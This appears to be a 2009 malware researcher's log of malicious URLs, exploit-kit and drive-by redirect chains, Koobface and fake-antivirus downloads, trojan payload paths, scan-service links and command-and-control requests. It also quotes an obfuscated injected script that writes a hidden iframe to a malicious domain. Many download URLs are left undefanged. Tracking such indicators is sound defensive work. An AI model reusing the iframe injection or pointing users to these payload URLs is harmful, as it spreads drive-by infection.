dolchepopka.ru/ol/in.phphttp://wepawet.cs.ucsb.edu/view.php?hash=c5e81e17c05c73c50ffd675d7932f33d&t=1241260417&type=js
http://dolchepopka.ru/1/load.php?id=6http://www.virustotal.com/de/analisis/b788baee70eaf595b2e8fc726484f8cf 10/40
http://dolchepopka.ru/ol/load.php?id=3http://www.virustotal.com/de/analisis/f95123d5cf3281012c6cc0766b381db1 4/40
-
redirects to exploits:
hxxp://tds4self.com/sutra/in.cgi?3Wepawet (http://wepawet.iseclab.org/view.php?hash=8d08793a7fce9b0edc095c038b00967f&t=1241256659&type=js)
exploits:
hxxp://webcom-software.net/links/?
hxxp://monkey-squad.net/monkey/index.php
hxxp://monkey-squad.net/monkey/spl/pdf.pdf
hxxp://bronotak.cn/phpmyadmin/index.php?
hxxp://qwu11a.biz/cpanel/spl/pdf.pdf
Wepawet (http://wepawet.iseclab.org/view.php?hash=1458d4c43388d9b059dadc0c86416d39&t=1241256889&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=40c522b5d94eefbd36ef5a027cfe3509&t=1241256556&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=ccb26870cf566e7f980ee4a46fc441b8&t=1241256743&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=6a89a05b812e9f981f08e25a21329dca&t=1241261515&type=js)
Wepawet (http://wepawet.cs.ucsb.edu/view.php?type=js&hash=5a88a5c5fc9f1aa0ca88fbd1beeeba9f&t=1241250527)
trojan:
hxxp://monkey-squad.net/monkey/exe.php
hxxp://qwu11a.biz/cpanel/exe.php
VirusTotal (http://www.virustotal.com/analisis/d6d3c79457cce29c2ef3ac44822e59eb) - 27/40 (67.5%)
VirusTotal (http://www.virustotal.com/analisis/d3fb0f65eafb1142d7d22355914dd011) - 11/40 (27.5%)
-
Exploit/trojan:
carpena.co.uk/cmweb/print/pdf.phphttp://wepawet.iseclab.org/view.php?hash=7e78a387e1c5eac47bd34922f4cef85f&t=1241336475&type=js
Koobface:(goes on and off all the time)
86.108.36.203/setup.exe
99.50.245.81/setup.exehttp://www.virustotal.com/analisis/bd22d575927bfbf1103713d8718c3a90
Redirects to exploits:
freak-vkontakte.bizcontain iframe to http://basesrv3.net/bin/in.php which is on MDL
wepawet gives Invalid hostname on this domain.
http://jsunpack.jeek.org/dec/go?url=freak-vkontakte.biz
-
koobface:
99.149.173.147/setup.exehttp://www.virustotal.com/analisis/600848442c7fed4e8727fc0bc4ee4963
Fake AV:
way4scan.info
-
Fake AV:
truepornmovies.com/scan/?id=259
truepornupload.com/codec.exehttp://www.virustotal.com/analisis/cf4edf2f5335aeb331a25c1267bfd36f
Koobface:
75.10.117.174/setup.exehttp://www.virustotal.com/analisis/a2b8e6c4944251f9fc6cf88c36865dd7
Trojan:
wc-zone.biz/root.exehttp://www.virustotal.com/analisis/6272b4bfc597e3de994ab200a91c0d44
Trojan:
lesbian-girlhard.com/ftp.exehttp://www.virustotal.com/analisis/4d51d8169ba9ad5d74189913c2f89c4b
Trojan Pinch:
siski-piski.biz/tarif/pin.exehttp://www.virustotal.com/analisis/ebf13bc733aff1068de51d379f3760da
Trojan:
fp3s.biz/6007.exehttp://www.virustotal.com/analisis/56081b98a809bdde7394834e262053cf
Trojan:
antivirus.vc/pictures/forum/ftp1.exehttp://www.virustotal.com/analisis/cc07134acd95c61cda816efb94778537
-
http://cutheatergroup.cn/fl/index.php
http://wepawet.iseclab.org/view.php?hash=3c532cd0cfca29264a4000f6e9476f16&t=1241447080&type=js
http://cutheatergroup.cn/fl/cache/readme.pdfhttp://wepawet.iseclab.org/view.php?hash=8078638d68a0675fe56b6e14ebf5425a&t=1241447310&type=js
http://cutheatergroup.cn/fl/load.php?id=4
http://cutheatergroup.cn/fl/load.php?id=5http://www.virustotal.com/analisis/a61bd8c9f1542069d75889f4f9040adc 8/39
-
Redirects to fake codec page
hxxp://rhianna.name/vidd/Wepawet (http://wepawet.iseclab.org/view.php?hash=9bc249ed3be0d9f451ab3a96d0dd4ba4&t=1241454697&type=js)
Fake codec page
hxxp://tubecollection2009.com/xxplay.php?id=40009
Trojan:
hxxp://kvm-softwares.com/softwarefortubeview.40009.exeVirusTotal (http://www.virustotal.com/analisis/b6082ec0b0c912976887d0549ed5a315) - 10/40 (25%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1f91f09153120c524a56fa4930c32dbe3)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=b179b7959a87bd316d7f7f11a993e037)
downloads:
hxxp://imageempires.com/perce/064c5b7bbc854008e18e97e54448fea26776e621b10f2f35f025196defd65efd23a07ce83fb8ef114/80f/perce.jpg
hxxp://picturesoffline.com/item/86ccfb2b2c651048211e775514986e728746d681618fff45b0b539ddffb6de8d73c0aca83fc8ef51e/50a/item.gif
hxxp://pictureswall.com/werber/109/216.jpg
VirusTotal (http://www.virustotal.com/analisis/5455beb9e4d430a802947aff82a28c45) - 28/40 (70%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=129c01269a6adfa745da5c44dbefb2560)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=e49048a38d0757b92a34dff6fc3b3f74)
VirusTotal (http://www.virustotal.com/analisis/7ff08733247ab68a16cba8621f5b403b) - 22/40 (55%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=11ad97792e7b27b543d32662c7752f36a)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=532bd3862d3500f65d3abada38c673c5)
VirusTotal (216.jpg - bb.jpg) (http://www.virustotal.com/analisis/6fd1a269e6d5fa4a25f3b057b57c3591) - 14/40 (35%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1e91fdd1c62e3db5469d63159691a8364)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=3b51dcb1768fd868c6a4c5a03299f807)
perce.jpg
HTTP Conversations:
216.240.157.91:80 - [imagesrepository.com]
POST /resolution.php
88.214.205.8:80 - [zone-searching.com]
POST /borders.php
item.gif
HTTP Conversations:
216.240.157.88:80 - [last-visit.com]
GET /cset.php?id=g/7bOKwqwd6bH3e9BvR2gC5DOC QMjuEVJXCr1HPwBvUhUpfkUo9FCofikcbokMC3jvn7vnlOfsSb ApC9D84VB4pDwQzKDIuNNR7WpvFBlUMPZcyrW3O9vf9lli2EaM wb5lhGwWRkdZIg74dRBmaah/YZsBERxLkPueyDpqK/ml4U4Vlw 96siO09AkAzfqTK81K4Kpw4ntiIe0J7ZDQvPKOlWVMEo9vNlcI..
GET /uget.php?id=g/7bOKwqwd6bH3e9BvR2gC5DOC QMjuEVJXCr1HPwBvUhUpfkUo9FCofikcbokMC3jvn7vnlOfsSb ApC9D84VB4pDwQzKDIuNNR7WpvFBlUMPZcyrW3O9vf9lli2EaM wb5lhGwWRkdZIg74dRBmaah/YZsBERxLkPueyDpqK/ml4U4Vlw 96siO09AkAzfqTK81K4Kpw4ntiIe0J7ZDQvPKOlWVMEo9vNlcI..
-
Trojan:
hxxp://kvm-softwares.com/softwarefortubeview.40009.exeVirusTotal (http://www.virustotal.com/analisis/b6082ec0b0c912976887d0549ed5a315) - 10/40 (25%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1f91f09153120c524a56fa4930c32dbe3)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=b179b7959a87bd316d7f7f11a993e037)
see also:
xxx-softwares.com
cool-softtech.com
rtfm-softweares.com
xyu-softportal.com
xepace-software.com
ce-softwares.com
dig-softportals.com
pac-softportal.com
-
This IP host similar websites with same payload: http://www.robtex.com/ip/195.88.80.41.html (http://www.robtex.com/ip/195.88.80.41.html)
can be download using "/softwarefortubeview.40007.exe" - "/softwarefortubeview.40008.exe" etc..
hxxp://xxx-softwares.com/softwarefortubeview.40009.exe
hxxp://cool-softtech.com/softwarefortubeview.40009.exe
hxxp://rtfm-softweares.com/softwarefortubeview.40009.exe
hxxp://xyu-softportal.com/softwarefortubeview.40009.exe
hxxp://xepace-software.com/softwarefortubeview.40009.exe
hxxp://ce-softwares.com/softwarefortubeview.40009.exe
hxxp://dig-softportals.com/softwarefortubeview.40009.exe
hxxp://pac-softportal.com/softwarefortubeview.40009.exe
File size: 65536 bytes
MD5...: b179b7959a87bd316d7f7f11a993e037
VirusTotal (http://www.virustotal.com/analisis/8f2b9ad6c0782cc4f50921d16061056a)
-
Also have the same structure with "promo.exe"
hxxp://xxx-softwares.com/promo.exe
hxxp://cool-softtech.com/promo.exe
hxxp://rtfm-softweares.com/promo.exe
hxxp://xyu-softportal.com/promo.exe
hxxp://xepace-software.com/promo.exe
hxxp://ce-softwares.com/promo.exe
hxxp://dig-softportals.com/promo.exe
hxxp://pac-softportal.com/promo.exe
File size: 74752 bytes
MD5: 951f3ee90eb3576325fa1920e3da678c
VirusTotal (http://www.virustotal.com/analisis/4551c0b455166626a3034c22888a856d) - 29/39 (74.36%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=101a845c61bdcac74392ebc2f97208986&call=first)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=5863553963378030c5223e76bca37da1)
HTTP Conversations:
216.240.148.9:80 - dfdsfdsfcdsc.com
Request: GET /bbb.php
Request: GET /ccc_2.php?uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1&aid=&os=513
-
related: teyrebuf[.]cn, gukgifoc[.]cn, beelposttraning[.]ru, dastrealworld[.]ru
redirects to exploits:
hxxp://dastrealworld.ru/denunreal.html
Wepawet (http://wepawet.iseclab.org/view.php?hash=10fc58eeacba6fa759b1305d1d30610d&t=1241486137&type=js)
the script that came with this one
<script>
document.write(unescape("%3c%73%74%79%6c%65%20%74%79%70%65%3d%22%74%65%78%74%2f%63%73%73%22%3e%20%69%66%72%61%6d%65%20%7b%77%69%64%74%68%3a%30%3b%68%65%69%67%68%74%3a%30%3b%62%6f%72%64%65%72%3a%30%3b%7d%20%3c%2f%73%74%79%6c%65%3e"));
</script>
<script>
eval(unescape("%76%61%72%20%62%32%34%20%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%31%30%34%2c%31%31%36%2c%31%31%36%2c%31%31%32%2c%35%38%2c%34%37%2c%34%37%2c%31%30%30%2c%39%37%2c%31%31%35%2c%31%31%36%2c%31%31%34%2c%31%30%31%2c%39%37%2c%31%30%38%2c%31%31%39%2c%31%31%31%2c%31%31%34%2c%31%30%38%2c%31%30%30%2c%34%36%2c%31%31%34%2c%31%31%37%2c%34%37%2c%31%30%30%2c%31%30%31%2c%31%31%30%2c%31%31%37%2c%31%31%30%2c%31%31%34%2c%31%30%31%2c%39%37%2c%31%30%38%2c%34%36%2c%31%30%34%2c%31%31%36%2c%31%30%39%2c%31%30%38%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%27%27%2b%62%32%34%2b%27%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%29%3b"));
</script>
the iframe:
<style type="text/css"> iframe {width:0;height:0;border:0;} </style>
var b24 = String.fromCharCode(104,116,116,112,58,47,47,100,97,115,116,114,101,97,108,119,111,114,108,100,46,114,117,47,100,101,110,117,110,114,101,97,108,46,104,116,109,108);document.write(unescape('<iframe src=\''+b24+'\'></iframe>'));
Found here:
http://wepawet.iseclab.org/view.php?hash=0495bd4385abfecfa1b5085b9027777d&t=1241485592&type=js (http://wepawet.iseclab.org/view.php?hash=0495bd4385abfecfa1b5085b9027777d&t=1241485592&type=js)
other on the same site
hxxp://dastrealworld.ru/underworld.html
hxxp://dastrealworld.ru/cover.html
Wepawet (http://wepawet.iseclab.org/view.php?hash=13648af19411e61a80007ca84c1b2ab5&t=1241486057&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=3caa65b128918f67b6d2d28b2d8e36b4&t=1241486229&type=js)
pdf exploits:
hxxp://gukgifoc.cn/nuc/spl/pdf.pdf
Wepawet (http://wepawet.iseclab.org/view.php?hash=60f130f89de4dc9c4bc40334423ce7d8&t=1241079304&type=js)
-
hxxp://totalweightlosscenter.com/images/go.php?sid=1
hxxp://nikolaevere.com/images/data/load.php
- - - - - - - - - - -
Pharmacy crap:
http://www.robtex.com/ip/203.117.111.123.html
- - - - - - - - - - -
Hadn't seen this lame trick in quite some time...
hxxp://www.mediapartner.by.ru/bunners/banunicom.gif
http://www.virustotal.com/analisis/228b180b2318b8477201eea15d09a0bb
Result: 7/40 (17.5%)
- - - - - - - - - - -
hxxp://update.dom11z.cn/cache/readme.pdf
http://www.virustotal.com/analisis/54bcdbcb1f52dc418c5af7fd965eb75e
Interesting ip...lots of domains them seem to redirect to update.dom11z.cn above,one way or another:
http://www.bfk.de/bfk_dnslogger.html?query=213.182.197.230#result
-
From the 213.182.197.2xx neighbourhood again...
hxxp://hostyapics.com/video/988/install_flash_player.exe
http://www.virustotal.com/analisis/72fa934c6d4d76a80a2d714d3586cc8b
Result: 4/40 (10%)
http://anubis.iseclab.org/?action=result&task_id=170666b5c144e68b4b9008d22642304c4&format=html
---->
hxxp://members.chello.pl/i.lemecha/index1.gif
http://www.virustotal.com/analisis/a9bb65e395a3f6a43ef8bec2790d9697
Result: 4/39 (10.26%)
http://anubis.iseclab.org/?action=result&task_id=1451aadd8279355c469500473ed1e00b3&format=html
--->
(Anubis results in short...i've commented only the ones that have a somewhat lousy detection rate):
hxxp://adimsceibh.com/progs/eqkxyll/cziwjnoo.php?adv=adv557
hxxp://adimsceibh.com/progs/eqkxyll/vblymjwx.php
hxxp://adimsceibh.com/progs/eqkxyll/bueesf.php
hxxp://adimsceibh.com/progs/eqkxyll/rtqrrfss.php
hxxp://adimsceibh.com/progs/eqkxyll/fczzm.php
hxxp://adimsceibh.com/progs/eqkxyll/hrnbopcqde.php
hxxp://adimsceibh.com/progs/eqkxyll/yvscpd.php // Result: 4/40 (10%) - Pinch
hxxp://adimsceibh.com/progs/eqkxyll/gqrrfft // Result: 9/41 (21.96%) - Vundo
-
PDF exploits(all the same, on IP - 91.212.41.119):
nicdaheb.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=d0151c3192d10713487fff545fab19ff&t=1241590847&type=js
sehmadac.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=e0ee4d85cd32c9d38378686a65413636&t=1241591188&type=js
vavgurac.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=de5856cb0d29edcbf0151722249c73f8&t=1241591259&type=js
tixleloc.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=614e78b7f2bf16d7fc76ebfd876e57d5&t=1241591442&type=js
teyrebuf.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=371a870529fc3101c03eeee07e93124c&t=1241591523&type=js
tukhemaj.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=251584c0c643dcfe6ba8ec2842547b76&t=1241591544&type=js
tixwagoq.cn/nuc/spl/pdf.pdfhttp://wepawet.iseclab.org/view.php?hash=aee55ad675950b610765dc60a7772a9d&t=1241591577&type=js
all lead to this trojan:
nicdaheb.cn/nuc/exe.phphttp://www.virustotal.com/analisis/3b2a31a93f84f0b540f14abbe54a89e0
Rogue:
antivguardian.com
antiawarepro.com
antivirprof.com
Fake AV:
stats.swpstats.com/getfile?id=26http://www.virustotal.com/analisis/ed4436020c7fe8208e13d0b19cda10db
Fake AV:
free-webscaners.com/scan
Koobface:
64.4.224.45/setup.exe
69.154.143.170/setup.exe
75.54.183.125/setup.exe
62.98.53.173/setup.exe
74.216.59.250/setup.exehttp://www.virustotal.com/analisis/6914e7738d5af094ac7105a4aa087a60
Trojan:
http://down.yyduowan.net/2.exehttp://www.virustotal.com/analisis/b008ea75feb56250e0124be694180c2d
Trojan:
svarkon.ru/update.exehttp://www.virustotal.com/analisis/f8f886d3907495a15f08d982bbae11b2
-
http://72.29.67.139/knb/megatrader-2k_20090505.exe
http://vilko.biz/opi/index.php
http://vilko.biz/opi/load.php
http://vilko.biz/opi/cache/readme.pdf
http://vilko.biz/myy/index.php
http://vilko.biz/myy/load.php
http://vilko.biz/myy/cache/readme.pdf
-
Exploit:(downloaded file on MDL)
liteautobestguide.cn/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=66fec491755fc72f675563dd6c4fc20a&t=1241645815&type=js
Also a trojan on that domain:
liteautobestguide.cn/load.phphttp://www.virustotal.com/analisis/bfbac430fbb0fb3096239b7c98d384ac
Koobface:
65.75.82.150/setup.exe
98.203.149.224/setup.exetrojan:
qqcfwaigua.com/cfwg.exehttp://www.virustotal.com/analisis/7403d735e83451ef65863b15b832d9ae
-
Koobface:
70.105.181.119/setup.exe
98.228.135.203/setup.exe
129.119.193.233/setup.exehttp://www.virustotal.com/analisis/89e1b7e8bf4f2be5773a1000a8dd3817
-
Koobface:
86.121.7.57/setup.exe
69.247.67.92/setup.exeTrojan:
greatjobdealuk.info/isp/upload/socksbot.exe http://www.virustotal.com/analisis/ef89795fe5c6a42f855e37216328e0cb
-
216.240.143.7
Fake codec page:
hxxp://better-tube-show.com/xxplay.php?id=40009
Registrant: Bobby Macleod (bobbym806@ gmail.com)
216.240.148.9
Returns malware urls:
hxxp://hjtktyjyhhn.com/fff9999.php?aid=0&uid=00cd1a40d41d8cd98f00b204e9800998ecf8427e&os=512
Registrant: Jameson Jack (cyber38462@ hotmail.com)
hxxp://imageempires.com/perce/8020ac6db14a14e0ed94c17da86c8d0938cff0c02ba29014aee9a81000a9b998de6c0f98a422879eb/400/perce.jpg hxxp://picturesoffline.com/item/60b08c6de14a64b07d04519db83c3dc948ef80e0bbf2e054ae09d830c0194928cecc8fb814f2678e0/b01/item.gif
hxxp://pictureswall.com/werber/b0f/216.jpg
hxxp://sdfv-programs.com/file.exe
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=f621255677a794be1390e48b47823fa0)
70.86.3.198 [c6.3.5646.static.theplanet.com]
Trojan Clicker:
hxxp://jump1.info/xxx.exe
hxxp://xxx.host800.com/xxx.exe
VirusTotal (http://www.virustotal.com/analisis/4abfb028c31a9979aaa09b9de52b7d5f) - 24/40 (60.00%)
Registrant: yong wang (edizhu@ hotmail.com)
Registrant: youguang wang (edisoho@ hotmail.com)
Trojan GameThief OnLineGames:
61.174.68.24
hxxp://www.361safae.cn/img/sri1.gif
hxxp://www.361safae.cn/img/sri2.gif
hxxp://www.361safae.cn/img/sri3.gif
hxxp://www.361safae.cn/img/sri4.gif
hxxp://www.361safae.cn/img/sri5.gif
hxxp://www.361safae.cn/img/sri6.gif
hxxp://www.361safae.cn/img/sri7.gif
hxxp://www.361safae.cn/img/sri8.gif
hxxp://www.361safae.cn/img/sri9.gif
Registrant: Xie Yang (ylaoda88@ 163.com)
VirusTotal (http://www.virustotal.com/analisis/e47da00f08d79ea42c45d7f01ed88291)
VirusTotal (http://www.virustotal.com/analisis/bb63e441554489f062be7dbdb5ee5fc0)
VirusTotal (http://www.virustotal.com/analisis/542d74d0849cea1a0aa0d673d9fddbf3)
VirusTotal (http://www.virustotal.com/analisis/f3d8ce321d53b6004d629c5e976790c0)
VirusTotal (http://www.virustotal.com/analisis/9b8a676e815e3feb25b0fe89c1220c72)
VirusTotal (http://www.virustotal.com/analisis/ad7c98b2bcc7454278e9b89cdce1962c)
VirusTotal (http://www.virustotal.com/analisis/164799816ed1a0455861268b3176bcc8)
VirusTotal (http://www.virustotal.com/analisis/e57ffc5b955bce7a44a1f410d2b0e9bf)
60.173.10.53
hxxp://ipshougou.com/down/qqma.exe
Registrant: phyto, phyto (support@ tongyong.net)
VirusTotal (http://www.virustotal.com/analisis/2f0359e1a9c783731865f01544a69c62)
-
Drivebys
http://sdfv-programs.com/file.exe
http://wtopcompany.ru/cms/load.php
http://bdsm-movies.info/33/load.php
http://p0rn-movies.com/77/load.php
http://clicks100.ru/cms/index.php
http://clicks100.ru/cms/load.php?id=0
http://clicks100.ru/tmp/in.php?i=20661JNE1C4793&o=2
http://clicks100.ru/top100/iframe.php
http://beelposttraning.ru/s/default.cgi
http://beelposttraning.ru/s/in.cgi?3
http://dastrealworld.ru/dance.html
http://dastrealworld.ru/denunreal.html
http://dastrealworld.ru/maufeorl.html
http://dastrealworld.ru/ne/in.php
http://dwnld.offer-provider.com/secure/bec4d39b22049ff339f0b9e576c5299f/4a054ac1/vsm/vsm_free_setup.exe
http://dwnld.offer-provider.com/secure/ef6ca9ceb9b5bd94db5fa8bdd7889251/4a054035/vsm/vsm_free_setup.exe
http://internetnamestore.cn/cache/flash.swf
http://internetnamestore.cn/cache/readme.pdf
http://internetnamestore.cn/in.cgi?income23
http://internetnamestore.cn/in.cgi?income27
http://internetnamestore.cn/index.php
http://internetnamestore.cn/load.php?id=0
http://internetnamestore.cn/load.php?id=8
http://operative.cc/liveinternet/index.php
http://operative.cc/liveinternet/load.php?id=4679
http://operative.cc/liveinternet/pdf.php?id=4679
http://teyrebuf.cn/nuc/%E0%AC%8B%E0%AC%8BAAAAAAAAAAAAAAAAAAAAAAAAA
http://teyrebuf.cn/nuc/exe.php
http://teyrebuf.cn/nuc/index.php
http://teyrebuf.cn/nuc/spl/pdf.pdf
http://teyrebuf.cn/s/in.cgi?10
http://updateserver.info/cmp/controller.php?&ver=8&uid=dc2335ef&aid=astakiller&adm=adm&inst=1&br=IEXPLORE.EXE&os=XPSP2
http://updateserver.info/loads/astakiller.dll
http://zone2tech.info/skp66.exe
Mebroot
http://ijpabevvif.com/ld/gnh_2/gnh2.exe
http://ijpabevvif.com/ld/gnh_3/gnh3.exe
http://ijpabevvif.com/ld/gnh_4/gnh4.exe
http://ijpabevvif.com/ld/gnh_5/gnh5.exe
http://ijpabevvif.com/ld/gnh_7/gnh7.exe
http://ijpabevvif.com/ld/gnh_8/gnh8.exe
http://ijpabevvif.com/ld/gnh_9/gnh9.exe
http://ijpabevvif.com/ld/grg/grg.exe
Misc
http://www.dofulfill.info/Packer.dll
http://www.dofulfill.info/TRSOCR.dat
http://www.dofulfill.info/TRSOCR.ini
http://www.dofulfill.info/TRSOCR.dll
http://www.dofulfill.info/AdvOcr.dll
http://www.casadosrelojoeiros.com.br/Imagens/lo.jpg
http://www.onlyfreegames.net/screen41.jpg
http://www.onlyfreegames.net/screen42.jpg
http://61.19.252.95/apaches.gif
http://61.19.252.95/apachew.gif
http://866muma.3322.org/csru.exe
http://866muma.3322.org/csrb.exe
http://866muma.3322.org/csrx.exe
http://866muma.3322.org/csrp.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/kill.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/1.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/2.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/3.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/4.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/5.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/6.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/7.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/8.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/9.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/10.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/11.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/12.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/13.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/14.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/15.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/16.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/17.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/18.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/19.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/20.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/21.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/22.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/23.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/24.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/25.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/26.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/27.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/28.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/29.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/30.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/31.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/32.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/33.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/a.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/b.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/c.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/d.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/e.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/f.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/g.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/h.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/45.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/46.dll
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/47.dll
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/a.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/48.dll
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/a.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/49.dll
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/a.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/51.dll
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/i.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/j.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/k.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/cap.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/m.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/hun.dll
http://down.aqbo.cn/soft/tool/%E5%AE%A2%E6%88%B7%E7%AB%AF%E4%B8%8B%E8%BD%BD13354.exe
http://f1.hf3y5.com/1/AcX.exe
http://f1.hf3y5.com/9/AcX.exe
http://d1.hf3y5.com/1/AcX.exe
http://h1.dgfg4.com/01/AeX.exe
http://h1.dgfg4.com/02/AeX.exe
http://h1.dgfg4.com/03/AeX.exe
http://h1.dgfg4.com/04/AeX.exe
http://h1.dgfg4.com/06/AeX.exe
http://h1.dgfg4.com/07/AeX.exe
http://h1.dgfg4.com/08/AeX.exe
http://h1.dgfg4.com/09/AeX.exe
http://h1.dgfg4.com/10/AeX.exe
http://h1.dgfg4.com/11/AeX.exe
http://h1.dgfg4.com/12/AeX.exe
http://h1.dgfg4.com/13/AeX.exe
http://h1.dgfg4.com/14/AeX.exe
http://h1.dgfg4.com/15/AeX.exe
http://h1.dgfg4.com/16/AeX.exe
http://h1.dgfg4.com/17/AeX.exe
http://h1.dgfg4.com/18/AeX.exe
http://h1.dgfg4.com/20/AeX.exe
http://h1.dgfg4.com/21/AeX.exe
http://www.ppggg.com.cn/www.exe
http://www.ppppg.com.cn/www.exe
http://www.pppph.com.cn/www.exe
http://www.ppppj.com.cn/www.exe
http://exe316.com/xiao/111.exe
http://exe316.com/xiao/aa14.exe
http://exe316.com/xiao/aa18.exe
http://exe316.com/xiao/aa28.exe
http://exe316.com/xiao/aa33.exe
http://gm.adsl8899.cn/nl34.exe
http://gm.adsl8899.cn/nl37.exe
http://gm.adsl8899.cn/nl38.exe
http://gm.adsl8899.cn/nl40.exe
http://up.cj-vv.cn:889/up1/up.exe
http://u2.ovfr6.com/lmm/S15.exe
http://u2.ovfr6.com/lmm/S16.exe
http://u2.ovfr6.com/lmm/S21.exe
http://u2.ovfr6.com/lmm/S01.exe
http://u3.ovfr6.com/lmm/M33.exe
http://u3.ovfr6.com/lmm/M37.exe
http://u3.ovfr6.com/lmm/M15.exe
http://u3.ovfr6.com/lmm/M24.exe
http://u3.ovfr6.com/lmm/M02.exe
http://u2.ovfr6.com/lmm/S13.exe
http://u2.ovfr6.com/lmm/S17.exe
http://u2.ovfr6.com/lmm/S20.exe
http://u2.ovfr6.com/lmm/S11.exe
http://u2.ovfr6.com/lmm/S02.exe
http://u9.ovfr6.com/cjj/a1.exe
http://u9.ovfr6.com/cjj/a2.exe
http://u9.ovfr6.com/cjj/a8.exe
http://u9.ovfr6.com/cjj/a6.exe
http://u9.ovfr6.com/cjj/a9.exe
http://u9.ovfr6.com/cjj/a10.exe
http://u9.ovfr6.com/cjj/sb.exe
http://u9.ovfr6.com/ttt/01/01.exe
http://adimsceibh.com/progs/royyl/lvreefo.php
http://bddanhdnfl.net/progs/royyl/lvreefo.php
http://adimsceibh.com/progs/royyl/yhrrrrsfob
http://bddanhdnfl.net/progs/royyl/yhrrrrsfob
http://aaqkweoslz.com/progs/royyl/clmvviwj.php
http://aaqkweoslz.com/progs/royyl/cyiivvvjjw.php
http://aaqkweoslz.com/progs/royyl/ggcqqdde.php
http://aaqkweoslz.com/progs/royyl/kqddj.php
http://aaqkweoslz.com/progs/royyl/lvreefo.php
http://aaqkweoslz.com/progs/royyl/wspcpq.php
